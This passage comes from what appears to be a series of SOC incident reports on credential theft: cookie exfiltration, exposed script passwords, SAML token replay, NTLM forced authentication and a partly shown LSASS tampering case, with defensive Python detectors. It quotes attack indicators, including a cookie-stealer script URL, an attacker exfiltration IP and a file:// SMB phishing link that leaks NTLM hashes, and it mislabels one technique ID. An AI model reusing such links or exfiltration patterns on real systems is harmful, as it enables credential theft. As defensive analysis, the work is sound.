Alert: “Suspicious Outbound Traffic – Session Cookie Exfiltration”.
User: rpatel@company.com (Engineering Department).
Destination: 185.143.221[.]89:8080.
Time: 2024-02-21 10:30 EST.
Technique: MITRE ATT&CK T1539 – Steal Web Session Cookie.
2. Technical Analysis:
Attack Chain:
10:00 – User visits engineering forum (forum.techhelp.com)
10:01 – Forum page contains malicious ad (injected via compromised ad network)
10:01 – Ad loads JavaScript from evil-site.com/stealer.js
10:02 – JavaScript runs in user’s browser
10:02 – Script enumerates all cookies from browser storage
10:03 – Script collects 13 session cookies
10:03 – Script sends cookies to 185.143.221[.]89:8080
10:05-10:30 – Attacker has valid session cookies
10:30 – Zscaler detects and alerts
Cookies Exfiltrated:
Company portal (ASP.NET_SessionId) – valid 30 minutes
Office 365 (.AspNet.Cookies) – valid 60 minutes
Confluence (JSESSIONID) – valid 2 hours
Jira (sessionid) – valid 2 hours
Salesforce (sid) – valid 1 hour
8 additional application cookies
Attacker Activity (based on logs):
10:04 – Accessed company portal using stolen cookie
10:05 – Viewed 3 documents
10:06 – Accessed Jira, viewed 2 tickets
10:07-10:30 – No further activity (possibly preparing)
No data downloaded
Malicious JavaScript:
URL: hxxp://evil-site.com/stealer.js
Function: document.cookie access, exfiltration via AJAX
Obfuscated to evade detection
3. Investigation Findings:
Timeline:
10:00 – User visits forum
10:02 – Cookies stolen
10:03 – Exfiltration
10:04-10:07 – Attacker accesses applications
10:30 – Zscaler alert
10:32 – SOC investigates
10:35 – All sessions terminated
10:36 – User logged out
Indicators of Compromise (IoCs):
Network:
– Exfiltration IP: 185.143.221[.]89:8080
– Malicious Script: hxxp://evil-site.com/stealer.js
– Compromised Site: forum.techhelp.com
Cookies:
– Multiple session cookies (all invalidated)
4. Containment Actions:
Immediate Actions:
Terminated all active sessions for user rpatel.
Invalidated all server-side sessions for affected applications.
Forced user logout from all applications.
Blocked exfiltration IP at firewall and Zscaler.
User Remediation:
Reset user password.
Cleared browser cache and cookies.
User educated on malicious ads.
Application Review:
Checked application logs for unauthorized access.
No data exfiltration confirmed.
No privilege escalation observed.
5. Root Cause Analysis:
Primary Cause: User visited compromised forum with malicious ad.
Contributing Factors:
Ad network security weak (allowed malicious script).
Session cookies not tied to IP/browser fingerprint.
No additional verification for session usage.
6. Business Impact:
Operational Impact: Engineering user offline for 1 hour.
Data Exposure: 3 documents and 2 Jira tickets viewed; no exfiltration.
Reputational Impact: None.
7. Remediation & Prevention:
Completed Actions:
Sessions terminated.
User logged out.
IP blocked.
Cookies invalidated.
Technical Controls Enhanced:
Implemented IP binding for session cookies (where supported).
Enabled additional session verification (user agent, IP consistency).
Deployed script blocking (NoScript, uBlock Origin) via GPO.
Enhanced Zscaler policy to block known malicious ad domains.
8. Conclusion:
A user visited a compromised forum where a malicious ad stole session cookies and exfiltrated them. The attacker briefly accessed applications before detection. Zscaler detected the cookie exfiltration, enabling session termination within minutes. No data was exfiltrated.
Closure Rationale: Sessions terminated; user secured; cookie exfiltration blocked.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-21 11:30 EST
End of Batch 14
Batch 15: Credential Access & Defense Evasion Incident Reports
71. T1552 – Unsecured Credentials (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-CREDS-1552-7842
Alert Time: 2024-02-22 09:30:15 EST
Severity: HIGH (88/100)
Source: Varonis Data Security Platform
Rule: “Sensitive Keywords Found in File – Potential Password Exposure”
MITRE ATT&CK: T1552.001 – Unsecured Credentials: Credentials in Files
Alert Details:
Detection: File containing plaintext credentials discovered on file share
File Details:
Path: \\filesrv\shared\IT\backup_scripts\sql_backup.ps1
Owner: jsmith (IT Administrator)
Last Modified: 2024-02-21 22:15 EST
File Size: 4.2 KB
Sensitivity Score: 95/100 (Critical)
File Content (excerpt):
```powershell
# SQL Backup Script
$sqlServer = "SQL-PROD-01"
$database = "FinanceDB"
$username = "sa"
$password = "P@ssw0rd123!" # CRITICAL: Plaintext password
$backupPath = "\\backupsrv\sql\finance.bak"
# Domain Admin credentials for backup service
$domainAdmin = "corp\svc_backup"
$domainPass = "Backup2024!" # CRITICAL: Domain account password
# Connect and run backup
Invoke-SqlBackup -Server $sqlServer -Database $database -Username $username -Password $password -Path $backupPath
```
Additional Findings:
File accessible to “Domain Users” group (2,500+ users)
File accessed by 3 users in last 24 hours (potentially compromised)
Contains credentials for:
SQL SA account (full database admin)
Domain service account (svc_backup) with backup privileges
No encryption or secure storage used
Detection Logic:
File contains keywords “password”, “pwd”, “pass” followed by plaintext
File on open share (excessive permissions)
Contains privileged account credentials
Pattern matches credential harvesting target
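Added example (not Varonis code): a scanner implementing the keyword-plus-literal rule above, run over a re-typed copy of the report's sql_backup.ps1 and over a hardened variant that obtains credentials at run time instead of embedding them. The output masks the secrets so the finding does not become a second exposure; the hardened script's cmdlets are an assumption about how the remediated backup job might look, not the SOC's actual fix.

```python
"""Plaintext-credential scanner for scripts, modelled on the Varonis rule in
this report: a password-like name followed by a quoted literal.

Added example; not Varonis's implementation. SAMPLE_SCRIPT is the report's
sql_backup.ps1 re-typed as sample input; SAFE_SCRIPT is a constructed
hardened variant. Masking and output format are assumptions.
"""
import re

# Credential-looking name on the left, quoted literal of 4+ chars on the right.
CRED_ASSIGN = re.compile(
    r"""(?P<name>\$?[\w.]*?(?:password|passwd|pwd|pass|secret|apikey|api_key)[\w.]*)"""
    r"""\s*[=:]\s*["'](?P<value>[^"']{4,})["']""",
    re.IGNORECASE,
)

# Ways a script can obtain a credential without storing it in the file.
SAFE_PATTERNS = re.compile(
    r"Get-Credential|Read-Host\s+-AsSecureString|Get-StoredCredential|Get-Secret\b",
    re.IGNORECASE,
)

# The report's script, re-typed (raw string keeps the Windows backslashes).
SAMPLE_SCRIPT = r"""
# SQL Backup Script
$sqlServer = "SQL-PROD-01"
$database = "FinanceDB"
$username = "sa"
$password = "P@ssw0rd123!" # CRITICAL: Plaintext password
$backupPath = "\\backupsrv\sql\finance.bak"
# Domain Admin credentials for backup service
$domainAdmin = "corp\svc_backup"
$domainPass = "Backup2024!" # CRITICAL: Domain account password
# Connect and run backup
Invoke-SqlBackup -Server $sqlServer -Database $database -Username $username -Password $password -Path $backupPath
""".lstrip("\n")

# Constructed hardened variant: secrets come from a credential store or an
# operator prompt at run time and never appear in the file.
SAFE_SCRIPT = r"""
# SQL Backup Script (hardened, hypothetical)
$sqlCred = Get-StoredCredential -Target "SQL-PROD-01-backup"
$domainCred = Get-Credential -UserName "corp\svc_backup" -Message "Backup service account"
$sqlPassword = Read-Host -AsSecureString "SQL password (leave blank to use stored credential)"
""".lstrip("\n")


def mask(value):
    """Keep two leading characters so the finding is recognisable, hide the rest."""
    return value[:2] + "*" * (len(value) - 2)


def scan_for_credentials(script_text):
    """Return [{"line", "name", "masked"}] for each hard-coded credential literal."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for m in CRED_ASSIGN.finditer(line):
            findings.append({"line": lineno, "name": m.group("name"),
                             "masked": mask(m.group("value"))})
    return findings


def uses_secure_retrieval(script_text):
    """True if the script obtains credentials through a secure prompt or store."""
    return bool(SAFE_PATTERNS.search(script_text))


if __name__ == "__main__":
    for label, text in (("sql_backup.ps1", SAMPLE_SCRIPT), ("hardened", SAFE_SCRIPT)):
        hits = scan_for_credentials(text)
        print(f"{label}: {len(hits)} plaintext credential(s); secure retrieval: {uses_secure_retrieval(text)}")
        for h in hits:
            print(f"  line {h['line']}: {h['name']} = {h['masked']}")
```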
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Varonis findings | Varonis Console | Confirmed plaintext credentials in PowerShell script |
| 2. File Remediation | Remove/move file to secure location | File Server Admin | File moved to secure IT share; permissions restricted |
| 3. Credential Rotation | Reset exposed passwords | Azure AD, SQL Admin | SQL SA password rotated; svc_backup password reset |
| 4. Access Investigation | Identify users who accessed file | Varonis, File Server Logs | 3 users accessed file; all investigated |
| 5. User Notification | Notify file owner (jsmith) | Email, Teams | jsmith counseled on secure credential storage |
| 6. Policy Update | Update secure coding guidelines | Documentation, Training | New policy: No plaintext credentials in scripts |
Jira Incident Report
Ticket: SOC-2024-111
Summary: T1552 – Plaintext Credentials Found in PowerShell Script on File Share
Status: RESOLVED
Resolution: INFORMATION EXPOSURE – Remediated
Priority: P2 – MEDIUM
Labels: T1552, unsecured-credentials, plaintext-passwords, varonis, file-share
Components: Data-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Sensitive Keywords Found in File – Potential Password Exposure”.
File: \\filesrv\shared\IT\backup_scripts\sql_backup.ps1.
Owner: jsmith (IT Administrator).
Time: 2024-02-22 09:30 EST.
Technique: MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files.
2. Technical Analysis:
Exposure Details:
File Type: PowerShell backup script
Location: Open file share accessible to all domain users (2,500+)
Contents: Two plaintext passwords:
SQL SA account: P@ssw0rd123! (full database admin)
Domain service account: Backup2024! (backup privileges)
Access History:
File accessed by 3 users in last 24 hours:
jsmith (owner) – legitimate
bturner (finance) – accessed 3 times (investigating)
rpatel (engineering) – accessed 2 times (investigating)
No evidence of data exfiltration (DLP logs clean)
Risk Assessment:
SQL SA account: Full access to all databases (customer data, financials)
svc_backup account: Can backup all domain data (including NTDS.dit)
Combined exposure: Potential for complete domain compromise
File Owner Response:
jsmith created script for legitimate backup automation
Used plaintext for convenience (violates policy)
Unaware of file share permissions
3. Investigation Findings:
Timeline:
02-21 22:15 – Script created/modified
02-22 09:30 – Varonis alert
09:32 – SOC investigates
09:35 – File secured
09:40 – Passwords rotated
Indicators of Compromise (IoCs):
File:
– \\filesrv\shared\IT\backup_scripts\sql_backup.ps1 (now secured)
Credentials:
– SQL SA: P@ssw0rd123! (rotated)
– svc_backup: Backup2024! (rotated)
Access:
– bturner (under investigation)
– rpatel (under investigation)
4. Containment Actions:
Immediate Actions:
Moved file to restricted IT share (IT admins only).
Removed access for Domain Users group.
Reset SQL SA password.
Reset svc_backup password.
User Investigation:
Interviewed bturner and rpatel.
Both accessed file accidentally while browsing shares.
No malicious intent; no data exfiltration.
Educated on security awareness.
Script Remediation:
Removed plaintext passwords from script.
Implemented secure credential storage (Windows Credential Manager).
Updated backup process.
5. Root Cause Analysis:
Primary Cause: IT admin stored plaintext credentials in script on open share.
Contributing Factors:
No secure credential storage policy.
File share permissions overly permissive.
No scanning for exposed credentials (until Varonis).
6. Business Impact:
Operational Impact: None (credentials rotated before misuse).
Data Exposure: Potential for credential theft; none confirmed.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
File secured.
Passwords rotated.
Users educated.
Technical Controls Enhanced:
Deployed Varonis scanning for all file shares.
Implemented secure credential storage policy.
Restricted file share permissions to least privilege.
Created automated alert for any files containing “password” + plaintext.
8. Conclusion:
An IT administrator stored plaintext credentials for privileged accounts in a PowerShell script on an open file share. Varonis detected the exposure before any compromise occurred. Credentials were rotated, and the file was secured.
Closure Rationale: File secured; credentials rotated; policy updated.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-22 10:30 EST
72. T1606 – Forge Web Credentials (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-TOKEN-FORGE-1606-7842
Alert Time: 2024-02-22 14:15:33 EST
Severity: CRITICAL (98/100)
Source: Azure AD Identity Protection
Rule: “Suspicious Token Usage – Anomaly Detected”
MITRE ATT&CK: T1606.002 – Forge Web Credentials: SAML Tokens
Alert Details:
Detection: Suspicious SAML token usage from untrusted location
User: kwilson@company.com (Karen Wilson – Finance Manager)
Time: 14:10 EST
Token Details:
Token Type: SAML (Security Assertion Markup Language)
Issuer: company.com (legitimate)
Audience: https://portal.company.com
Issue Time: 14:05 EST
Expiration Time: 14:35 EST (30 minutes)
Claims: User=kwilson, Role=FinanceAdmin, MFA=True
Usage Details:
First Usage: 14:10 EST from IP 45.134.225[.]78 (Bulgaria)
Second Usage: 14:11 EST from IP 185.143.221[.]89 (Bulgaria)
Third Usage: 14:12 EST from IP 194.165.16[.]89 (Romania)
Fourth Usage: 14:13 EST from IP 192.168.45.78 (internal – engineering host)
Anomaly Detection:
Token created at 14:05 from legitimate user location (New York)
Token used from Bulgaria 5 minutes later (impossible travel)
Token used from 4 different IPs in 4 minutes (impossible for single user)
Token claims include MFA=True, but no MFA challenge at time of use
Pattern matches SAML token theft and replay
Additional Context:
User kwilson reported “strange login notifications” at 14:05
User did NOT log in at that time
Token likely stolen from browser session or intercepted
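Added example (not Microsoft's detection): the anomaly checks listed above run over a constructed token-usage log, reporting a token presented from more than one IP inside a short window and from another country only minutes after its first use. The IPs and times are the report's; the token IDs, country codes, the internal host's country and the thresholds are constructed assumptions.

```python
"""SAML token replay detector modelled on the Azure AD anomaly list in this
report: one assertion presented from several IPs in a short window, and from
a country other than its issuing location minutes after issuance.

Added example; not Microsoft's logic. Token IDs, countries and the first
(issuing) usage record are constructed; the attacker IPs and times are the
report's. The earliest usage of each token is treated as its issuing context.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed usage log: "time,user,token_id,ip,country".
SAMPLE_TOKEN_USAGE = """\
14:05,kwilson@company.com,tok-c0ffee,203.0.113.7,US
14:10,kwilson@company.com,tok-c0ffee,45.134.225.78,BG
14:11,kwilson@company.com,tok-c0ffee,185.143.221.89,BG
14:12,kwilson@company.com,tok-c0ffee,194.165.16.89,RO
14:13,kwilson@company.com,tok-c0ffee,192.168.45.78,US
14:20,bsmith@company.com,tok-deadbeef,203.0.113.9,US
14:40,bsmith@company.com,tok-deadbeef,203.0.113.9,US
"""


def parse_usage(text):
    """Parse the CSV sample into dicts, oldest first."""
    rows = []
    for line in text.strip().splitlines():
        ts, user, tok, ip, country = line.split(",")
        rows.append({"ts": datetime.strptime(ts, "%H:%M"), "user": user,
                     "token": tok, "ip": ip, "country": country})
    return sorted(rows, key=lambda r: r["ts"])


def detect_token_replay(usages, window=timedelta(minutes=10), max_ips=1,
                        min_travel=timedelta(hours=2)):
    """Return {token_id: finding} for tokens that look replayed.

    "ips_in_window" is the largest set of distinct IPs that presented the
    token inside any `window`-long span (more than max_ips is suspicious even
    for the internal host, since one user cannot be in four places).
    "impossible_travel_from" lists presentations from a country other than the
    issuing one less than `min_travel` after first use.
    """
    by_token = defaultdict(list)
    for u in usages:
        by_token[u["token"]].append(u)
    findings = {}
    for tok, rows in by_token.items():
        first = rows[0]
        burst_ips = set()
        for i, r in enumerate(rows):
            span = {x["ip"] for x in rows[i:] if x["ts"] - r["ts"] <= window}
            if len(span) > len(burst_ips):
                burst_ips = span
        impossible = [r["ip"] for r in rows[1:]
                      if r["country"] != first["country"]
                      and r["ts"] - first["ts"] < min_travel]
        if len(burst_ips) > max_ips or impossible:
            findings[tok] = {"user": first["user"],
                             "ips_in_window": sorted(burst_ips),
                             "impossible_travel_from": impossible}
    return findings


if __name__ == "__main__":
    for tok, f in detect_token_replay(parse_usage(SAMPLE_TOKEN_USAGE)).items():
        print(f"{tok} ({f['user']}): {len(f['ips_in_window'])} IPs in window; "
              f"impossible travel from {f['impossible_travel_from']}")
```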
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Azure AD alert | Azure AD Identity Protection | Confirmed SAML token replay attack |
| 2. Immediate Action | Revoke all user tokens | Azure AD PowerShell | All tokens for kwilson revoked |
| 3. User Session Termination | Force logout all sessions | Azure AD | User logged out everywhere |
| 4. Password Reset | Reset user password | Azure AD | Password reset; MFA re-enrolled |
| 5. Investigation | Determine token source | Browser History, EDR | Token stolen via malicious browser extension |
| 6. Host Remediation | Clean infected workstation | CrowdStrike | Malicious extension removed |
Jira Incident Report
Ticket: SOC-2024-112
Summary: T1606 – SAML Token Theft and Replay Attack
Status: RESOLVED
Resolution: MALICIOUS – Tokens Revoked
Priority: P1 – CRITICAL
Labels: T1606, forge-web-credentials, saml-token, token-theft, azure-ad
Components: Identity-Management, Cloud-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection.
Alert: “Suspicious Token Usage – Anomaly Detected”.
User: kwilson@company.com (Finance Manager).
Time: 2024-02-22 14:15 EST.
Technique: MITRE ATT&CK T1606.002 – Forge Web Credentials: SAML Tokens.
2. Technical Analysis:
Attack Chain:
13:45 – User visits compromised website (finance blog)
13:46 – Site contains malicious browser extension installer (drive-by)
13:47 – Extension installed without user knowledge
13:48 – Extension monitors browser traffic
14:05 – User logs into company portal legitimately
14:05 – SAML token issued (valid 30 minutes)
14:05 – Extension steals token from browser storage
14:06 – Token exfiltrated to attacker C2
14:10-14:13 – Attacker replays token from multiple IPs
14:15 – Azure AD detects anomalous usage
Token Replay Details:
IP 45.134.225[.]78: Accessed financial reports (read-only)
IP 185.143.221[.]89: Accessed vendor payment portal
IP 194.165.16[.]89: Attempted wire transfer (blocked – required second approver)
IP 192.168.45.78: Accessed internal wiki (reconnaissance)
Malicious Browser Extension:
Name: “Google Docs Offline Helper” (masquerading)
Permissions: Read all data on websites
Behavior: Exfiltrates tokens, cookies, session data
Source: Chrome Web Store (removed after report)
User Activity:
User reported “strange login notifications” at 14:05
Did not authorize any logins from unusual locations
3. Investigation Findings:
Timeline:
13:45-13:48 – Extension installed
14:05 – Legitimate login, token stolen
14:06 – Token exfiltrated
14:10-14:13 – Attacker activity
14:15 – Alert triggers
14:17 – SOC investigates
14:18 – All tokens revoked
14:19 – User forced logout
Attacker Activity Assessment:
Viewed 3 financial reports (no sensitive data)
Accessed vendor payment portal (no transactions)
Attempted wire transfer (blocked by dual control)
No data downloaded
Indicators of Compromise (IoCs):
Network:
– Attacker IPs: 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89, 192.168.45.78
Browser Extension:
– Name: “Google Docs Offline Helper”
– ID: gdoc-helper-12345
Token:
– SAML token for kwilson (now revoked)
4. Containment Actions:
Immediate Actions:
Revoked all active tokens for kwilson.
Force logout from all applications.
Reset user password.
Re-enrolled MFA.
Host Remediation:
Removed malicious browser extension.
Cleared browser cache and cookies.
Full scan (no other malware).
Application Review:
Checked financial systems for unauthorized transactions (none).
Reviewed vendor payment logs (none).
5. Root Cause Analysis:
Primary Cause: User installed malicious browser extension.
Contributing Factors:
Extension allowed excessive permissions.
No extension allowlist/blocklist in place.
User unaware of extension risks.
6. Business Impact:
Operational Impact: Finance manager offline for 2 hours.
Financial Impact: None (wire transfer blocked).
Data Exposure: 3 financial reports viewed; no exfiltration.
7. Remediation & Prevention:
Completed Actions:
Tokens revoked.
Extension removed.
User educated.
Attacker blocked.
Technical Controls Enhanced:
Implemented Chrome extension allowlist (only approved extensions).
Enabled token binding (where supported).
Enhanced Azure AD token protection (conditional access policies).
Deployed browser isolation for high-risk users.
8. Conclusion:
An attacker used a malicious browser extension to steal a SAML token from a Finance manager and replay it from multiple locations. Azure AD detected the anomalous token usage within minutes. All tokens were revoked before significant damage occurred.
Closure Rationale: Tokens revoked; extension removed; user secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 15:30 EST
73. T1187 – Forced Authentication (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-FORCED-AUTH-1187-7842
Alert Time: 2024-02-22 11:30:22 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Network Connection – Potentially Forced Authentication”
MITRE ATT&CK: T1187 – Forced Authentication
Alert Details:
Detection: Outbound SMB connection to attacker-controlled server (potentially for NTLM relay)
Host: ENG-WS-078 (Engineering Workstation)
User: alexchen (Alex Chen, Engineer)
Time: 11:25 EST
Connection Details:
Source: 192.168.78.45 (ENG-WS-078)
Destination: 185.143.221[.]89:445 (SMB)
Protocol: SMB (Server Message Block)
Authentication: NTLMv2 (initiated by client)
Status: Connection established
Process Details:
Process: explorer.exe (PID: 2341)
Thread: Opened file from UNC path: \\185.143.221[.]89\share\document.pdf
User: alexchen (authenticating automatically)
Additional Events:
11:24: User received email with link: file://\\185.143.221[.]89\share\document.pdf
11:24: User clicked link
11:25: Explorer.exe attempted to connect to remote SMB share
11:25: NTLM authentication initiated (user’s credentials sent)
11:25: MDI detects suspicious outbound SMB
Detection Logic:
Outbound SMB to external IP (unusual – SMB typically internal)
Destination IP known for malicious activity
User initiated connection via file:// link
Pattern matches “forced authentication” (NTLM relay) attack
Threat Intelligence:
IP 185.143.221[.]89 known for NTLM relay attacks
Technique: Force user to authenticate to attacker server
Attacker relays NTLM hash to authenticate to other services
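The two signals in the detection logic above, outbound SMB to a public IP and a file:// link pointing at an external host, written out as a small detector over constructed telemetry. This is an added example, not part of the original report: the record layout, the sample connection rows and the sample email body are constructed, with the report's indicator reused as the link target.

```python
"""Forced-authentication (T1187) detection over constructed telemetry.

Two checks from the report's detection logic:
  1. outbound SMB (445/139) from a workstation to a non-private IP;
  2. file:// or bare UNC links in an email body that point at an external host.
The telemetry format and the sample records are constructed for this example.
"""
import ipaddress
import re

SMB_PORTS = {445, 139}

# file://\\host\share\file.pdf or bare \\host\share\file.pdf; the host may be
# a name or an IP, possibly defanged with "[.]" (undone by refang below).
UNC_LINK_RE = re.compile(r"(?:file://)?\\\\([^\\\s]+)((?:\\[^\\\s]+)+)", re.IGNORECASE)

# Constructed connection records: ts,host,user,process,src_ip,dst_ip,dst_port
SAMPLE_CONNECTIONS = """\
11:25:01,ENG-WS-078,alexchen,explorer.exe,192.168.78.45,185.143.221.89,445
11:25:02,ENG-WS-078,alexchen,explorer.exe,192.168.78.45,192.168.10.5,445
11:25:03,ENG-WS-078,alexchen,chrome.exe,192.168.78.45,185.143.221.89,443
11:25:04,FIN-WS-012,bturner,svchost.exe,192.168.78.50,10.0.0.7,139
"""

# Constructed phishing body carrying the link quoted in the report (defanged),
# plus a benign internal UNC link for contrast.
SAMPLE_EMAIL = (
    "Your document is ready for review: "
    "file://\\\\185.143.221[.]89\\share\\document.pdf\n"
    "Internal copy: \\\\fileserver01\\shared\\document.pdf"
)


def refang(indicator: str) -> str:
    """Undo the common '[.]' defanging used in reports."""
    return indicator.replace("[.]", ".")


def is_external(host: str) -> bool:
    """True for a routable public IP; hostnames and private/special ranges give False."""
    try:
        addr = ipaddress.ip_address(refang(host))
    except ValueError:
        return False  # a DNS name would need resolution; not judged here
    return addr.is_global


def detect_outbound_smb(records: str) -> list[dict]:
    """Flag SMB connections whose destination is a public IP (SMB should stay internal)."""
    findings = []
    for line in records.strip().splitlines():
        ts, host, user, proc, src, dst, port = line.split(",")
        if int(port) in SMB_PORTS and is_external(dst):
            findings.append({"time": ts, "host": host, "user": user,
                             "process": proc, "dst": f"{dst}:{port}"})
    return findings


def extract_unc_links(body: str) -> list[dict]:
    """Pull file:// and UNC links out of an email body and mark external targets."""
    links = []
    for m in UNC_LINK_RE.finditer(body):
        host = refang(m.group(1))
        links.append({"host": host, "path": m.group(2), "external": is_external(host)})
    return links


def correlate(records: str, body: str) -> set[str]:
    """Hosts that appear both as an external link target and as an SMB destination."""
    link_hosts = {l["host"] for l in extract_unc_links(body) if l["external"]}
    conn_hosts = {f["dst"].rsplit(":", 1)[0] for f in detect_outbound_smb(records)}
    return link_hosts & conn_hosts


if __name__ == "__main__":
    for f in detect_outbound_smb(SAMPLE_CONNECTIONS):
        print("outbound SMB to external host:", f)
    for l in extract_unc_links(SAMPLE_EMAIL):
        print("UNC link:", l)
    print("correlated hosts:", correlate(SAMPLE_CONNECTIONS, SAMPLE_EMAIL))
```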
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed forced authentication attempt |
| 2. Network Block | Block outbound SMB to external IP | Palo Alto Firewall | SMB to 185.143.221[.]89 blocked |
| 3. User Notification | Contact user immediately | Teams, Phone | User warned; credential reset initiated |
| 4. Credential Reset | Reset user password | Azure AD, AD | Password reset; MFA enforced |
| 5. Relay Check | Check if credentials were used elsewhere | Azure AD Logs, SIEM | No subsequent logins from attacker IP |
| 6. Email Investigation | Find source email | Proofpoint, Exchange | Email quarantined; sender blocked |
Jira Incident Report
Ticket: SOC-2024-113
Summary: T1187 – Forced Authentication Attempt via Malicious SMB Link
Status: RESOLVED
Resolution: MALICIOUS – Authentication Blocked
Priority: P2 – MEDIUM
Labels: T1187, forced-authentication, ntlm-relay, mdi, phishing
Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Network Connection – Potentially Forced Authentication”.
Host: ENG-WS-078 (Engineering Department, user alexchen).
Destination: 185.143.221[.]89:445 (SMB).
Time: 2024-02-22 11:30 EST.
Technique: MITRE ATT&CK T1187 – Forced Authentication.
2. Technical Analysis:
Attack Chain:
11:20 – User receives phishing email from “security@company-update[.]net”
11:21 – Email contains link: file://\\185.143.221[.]89\share\document.pdf
11:22 – User clicks link (expecting PDF document)
11:22 – Windows Explorer attempts to connect to remote SMB share
11:22 – NTLM authentication automatically triggered (user’s credentials sent)
11:23 – Connection established to attacker server
11:23 – Attacker receives NTLM hash
11:25 – MDI detects and alerts
Forced Authentication Technique:
Method: File:// link to remote SMB share
Why it works: Windows automatically sends current user credentials when accessing network resources
Attacker Goal: Capture NTLM hash for relay or offline cracking
Attacker Capabilities with NTLM Hash:
Could relay to other services (if SMB signing not required)
Could attempt offline cracking (weak password)
Could use for Pass-the-Hash attacks
User Password Strength:
Password: “Summer2024!” (moderate complexity)
Crackable offline (estimated 2-3 days)
3. Investigation Findings:
Timeline:
11:20 – Phishing email received
11:22 – User clicks link
11:22-11:23 – NTLM hash sent
11:25 – MDI alert
11:27 – SOC investigates
11:28 – User contacted
11:29 – SMB blocked
11:30 – Password reset initiated
Indicators of Compromise (IoCs):
Network:
– Attacker SMB server: 185.143.221[.]89:445
– SMB share: \\185.143.221[.]89\share\
Email:
– Sender: security@company-update[.]net
– Link: file://\\185.143.221[.]89\share\document.pdf
User:
– alexchen (credentials potentially compromised)
4. Containment Actions:
Immediate Actions:
Blocked outbound SMB to external IP at firewall.
Reset user password.
Enforced MFA (if not already enabled).
Quarantined email from all mailboxes.
Credential Monitoring:
Checked Azure AD logs for any logins from attacker IP (none).
Checked for any suspicious activity using alexchen account (none).
User Remediation:
User educated on file:// links and forced authentication risks.
5. Root Cause Analysis:
Primary Cause: User clicked malicious file:// link in phishing email.
Contributing Factors:
Outbound SMB allowed to internet (should be blocked).
User unaware of forced authentication technique.
NTLM enabled (legacy protocol).
6. Business Impact:
Operational Impact: Engineer offline for 1 hour (password reset).
Data Exposure: NTLM hash captured; password reset before cracking.
7. Remediation & Prevention:
Completed Actions:
Password reset.
SMB blocked.
User educated.
Technical Controls Enhanced:
Blocked outbound SMB to internet (firewall rule).
Disabled NTLM where possible (migrated to Kerberos).
Enabled SMB signing to prevent relay.
Created email filtering rule for file:// links.
8. Conclusion:
An attacker used a phishing email with a file:// SMB link to force a user to authenticate to an external server, capturing their NTLM hash. MDI detected the outbound SMB connection, enabling password reset before the hash could be cracked or relayed.
Closure Rationale: Password reset; SMB blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-22 12:30 EST
74. T1556 – Modify Authentication Process (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-AUTH-MOD-1556-7842
Alert Time: 2024-02-22 16:30:45 EST
Severity: CRITICAL (98/100)
Source: CrowdStrike Falcon EDR
Rule: “Authentication DLL Injection – Potential Credential Theft”
MITRE ATT&CK: T1556.003 – Modify Authentication Process: Pluggable Authentication Modules
Alert Details:
Detection: Suspicious DLL injected into LSASS process
Host: DC-01 (Primary Domain Controller)
User: SYSTEM
Time: 16:25 EST
Process Details:
Target Process: lsass.exe (PID: 568) – Local Security Authority Subsystem Service
Suspicious DLL: C:\Windows\System32\winlogon.dll (modified version)
Original DLL Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current DLL Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: 16:20 EST
API Calls:
LsaRegisterLogonProcess (registered rogue authentication package)
LsaApLogonUser (hooking logon attempts)
LsaApCallPackage (intercepting authentication)
Detection Logic:
winlogon.dll is not a legitimate LSASS-loaded DLL (suspicious)
DLL hash mismatch (modified)
DLL intercepts authentication calls
Pattern matches credential theft via authentication package
Additional Context:
Domain Controller (critical infrastructure)
LSASS handles all authentication for domain
Compromise would give attacker all domain credentials
Threat Intelligence:
Technique known as “SSP (Security Support Provider) hijacking”
Attacker can capture plaintext passwords during logon
Requires admin privileges to install
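A defender-side baseline check for the two artefacts this report names: the LSA “Security Packages” registry value that a rogue SSP is added to, and LSASS loading a security package (Windows Security event 4622, “A security package has been loaded by the Local Security Authority”). This is an added example, not the report's or CrowdStrike's code; both baseline sets, the `reg query` text and the event lines are constructed.

```python
"""Baseline check for Security Support Provider (SSP) tampering on a DC.

Two artefacts named in the report are compared with an allowlist taken from
a known-good domain controller: the LSA "Security Packages" registry value
(as printed by `reg query`) and Security event 4622, "A security package has
been loaded by the Local Security Authority". Both baselines, the reg query
text and the event lines are constructed for this example; replace the
baselines with values captured from your own golden image.
"""
import re

LSA_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"

# Assumed baseline (constructed): package names normally listed in the
# "Security Packages" value on a known-good DC.
BASELINE_REG_PACKAGES = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"}

# Assumed baseline (constructed): display names LSA reports in event 4622.
BASELINE_4622_NAMES = {"kerberos", "ntlm", "negotiate", "schannel",
                       "wdigest", "tsssp", "pku2u", "cloudap"}

# Constructed `reg query` output; REG_MULTI_SZ entries print "\0"-separated.
SAMPLE_REG_QUERY = r"""
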